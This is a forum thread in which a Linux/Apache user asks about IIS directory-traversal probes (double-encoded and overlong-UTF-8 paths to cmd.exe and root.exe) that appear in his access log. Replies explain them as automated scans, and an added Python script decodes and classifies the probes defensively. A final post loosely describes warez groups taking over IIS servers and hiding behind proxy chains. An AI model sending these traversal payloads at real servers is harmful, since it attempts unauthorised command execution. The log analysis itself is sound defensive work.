Web Server Attacks?
Busby
Golden Member
Posts: 1890
Joined: Tue Nov 28, 2000 6:25 pm
Location: Atlanta Area, GA, USA

Post by Busby »

I have a computer running Debian 3.0 and I am messing around using Apache. I set up the webserver and such (actually have 3 instances of Apache that listen on different ports). Today was the first day that I allowed the ports to be forwarded from my router so I could access it from school. I have authentication set up (users + passwords) and on my port 80 server I have it so it only allows from my home network basically. Well today I decided to check my Access.log file and there were a lot of instances where I saw the following:
"GET /scripts/root.exe?/c+dir HTTP/1.0" 403 283 "-" "-"
"GET /MSADC/root.exe?/c+dir HTTP/1.0" 403 281 "-" "-"
"GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 403 291 "-" "-"
"GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 403 291 "-" "-"
"GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 403 305 "-" "-"
"GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 403 322 "-" "-"
"GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 403 322 "-" "-"
"GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 403 338 "-" "-"
"GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 403 304 "-" "-"
"GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 300 "-" "-"
"GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 403 304 "-" "-"
"GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 403 304 "-" "-"
"GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 284 "-" "-"
"GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 284 "-" "-"
"GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 403 305 "-" "-"
"GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 403 305 "-" "-"

Now I'm not stupid but it appears as though people are trying to crash the server, which is running Windows. It is on Debian and everything is working and up to date and such. Should I worry about these or just ignore them as script kiddies scanning port 80 and trying to crash a webserver? The reason I ask is I also run MySQL and I have phpMyAdmin working, but it is under the protected one where connections are limited to my network. I don't want people to be able to get into phpMyAdmin and then mess with my MySQL databases. Any concerns? Should I just block port 80?
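The requests quoted above are IIS directory-traversal probes: double-encoded (`%255c`) and overlong UTF-8 (`%c0%af`, `%c1%1c`) backslashes aimed at `cmd.exe` and `root.exe`, which do not exist on a Linux/Apache host. The following Python is an added example, not code from this thread, that decodes such requests the way IIS would have and tallies how Apache actually answered them; the sample log lines are constructed from the ones in the post (which already had the client IP and timestamp trimmed off).

```python
"""Classify IIS Unicode/double-decode probes found in an Apache access log.

Added example for the thread above, not the poster's code. The lines in
SAMPLE_LOG are constructed from the ones quoted in the post.
"""
import re
from collections import Counter
from urllib.parse import unquote

# Constructed sample: request, status and size fields as quoted in the post.
SAMPLE_LOG = r'''
"GET /scripts/root.exe?/c+dir HTTP/1.0" 403 283 "-" "-"
"GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 403 305 "-" "-"
"GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 403 304 "-" "-"
"GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 300 "-" "-"
"GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 284 "-" "-"
"GET /index.html HTTP/1.0" 200 1523 "-" "Mozilla/4.0"
'''

LINE_RE = re.compile(r'"(?P<method>\S+) (?P<path>\S+) [^"]+" (?P<status>\d{3}) \S+')

# Binaries that only exist on Windows; a request for them on a Linux box is a probe.
WINDOWS_TARGETS = ("cmd.exe", "root.exe")


def decode_path(raw: str, rounds: int = 2) -> str:
    """Percent-decode repeatedly: %255c -> %5c -> backslash (IIS double decode)."""
    path = raw
    for _ in range(rounds):
        path = unquote(path, errors="replace")
    return path


def classify(path: str) -> str:
    """Return 'iis-unicode-traversal', 'iis-cmd-probe' or 'normal' for one request path."""
    decoded = decode_path(path).lower()
    target = decoded.split("?", 1)[0].rsplit("/", 1)[-1].rsplit("\\", 1)[-1]
    # Overlong UTF-8 (%c0.., %c1..) was IIS's other way of smuggling a slash.
    traversal = "../" in decoded or "..\\" in decoded or "%c0%" in path.lower() or "%c1%" in path.lower()
    if target in WINDOWS_TARGETS:
        return "iis-unicode-traversal" if traversal else "iis-cmd-probe"
    return "normal"


def summarize(log_text: str) -> dict:
    """Count request categories and the status codes Apache returned to the probes."""
    kinds, statuses = Counter(), Counter()
    for line in log_text.strip().splitlines():
        m = LINE_RE.search(line)
        if not m:
            continue
        kind = classify(m["path"])
        kinds[kind] += 1
        if kind != "normal":
            statuses[m["status"]] += 1
    return {"kinds": dict(kinds), "probe_statuses": dict(statuses)}
```

Every probe in the sample ends in a 403, 404 or 400, which is what you want to see: the traversal never resolved to a file on this server.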
PreDatoR
Life Member
Posts: 5554
Joined: Wed Nov 22, 2000 8:01 pm

Post by PreDatoR »

Your server was being hacked... Common thing that happens with Winshit servers. The SQL and IIS are too vulnerable and prone to attacks. Find any directories that were once not there or anything like that. From what it looks like they were trying to gain access to build an FTP server on your server. Search Google for "sql iis ftp hacking"; it should pull up some info about it.
Busby
Golden Member
Posts: 1890
Joined: Tue Nov 28, 2000 6:25 pm
Location: Atlanta Area, GA, USA

Post by Busby »

Ok I totally just realized I made an error.

"Now I'm not stupid but it appears as though people are trying to crash the server, which is running Windows"

meant to read "Now I'm not stupid but it appears as though people are trying to crash a server which is running Windows". Again this box is a Linux box so those things did nothing at all. This is not IIS but Apache for Linux and I am running MySQL server and not MSSQL. I have multiple instances of those same logs and all are from a different IP address so I assume it is just script kiddies that run a port scan, find an open port 80 and then have those commands automatically executed. Everything is running fine and nothing is wrong so I dunno.
PreDatoR
Life Member
Posts: 5554
Joined: Wed Nov 22, 2000 8:01 pm

Post by PreDatoR »

If you're running Linux I wouldn't worry then. I'm sure it's hackable but a lot more secure than any Windows servers... If you look at the commands they are trying to do, they're trying to do it on a Windows system. Damn rookies lol
Gand1
Posts: 681
Joined: Wed Nov 22, 2000 9:29 am
Location: Bethlehem, PA

Post by Gand1 »

Yeah, that is definitely script kiddies trying to hack, very badly mind you. It looks like they are trying to run a few commands via the URL line.
plucky duck
Posts: 2116
Joined: Wed Nov 22, 2000 12:35 pm
Location: Earth

Post by plucky duck »

I'm trying to read the log and I see some cmd.exe and root.exe, those are executive commands? What do the scripts do and whereabouts are they doing it? In the web browser URL?
PreDatoR
Life Member
Posts: 5554
Joined: Wed Nov 22, 2000 8:01 pm

Post by PreDatoR »

Any of you ever heard of the FXP scene? I know there's probably a bunch of you that do. But I'll tell you this: that wasn't done by a script, and if it was done on a vulnerable IIS or SQL Windows server it would have been hacked. They find vulnerable servers and hack them for the sole purpose of putting Serv-U on it and running an FTP. Everything on the server is left as normal; they just want the FTP running on it. They normally only hack 5mbit and up connections for the download speed. Then upload the newest warez for their groups to share and download from. It's really not that hard to hack them, some use IE to do it, others use telnet. And the good hackers use 3-5 SOCKS 4 or 5 proxies so it's impossible to be traced back to them.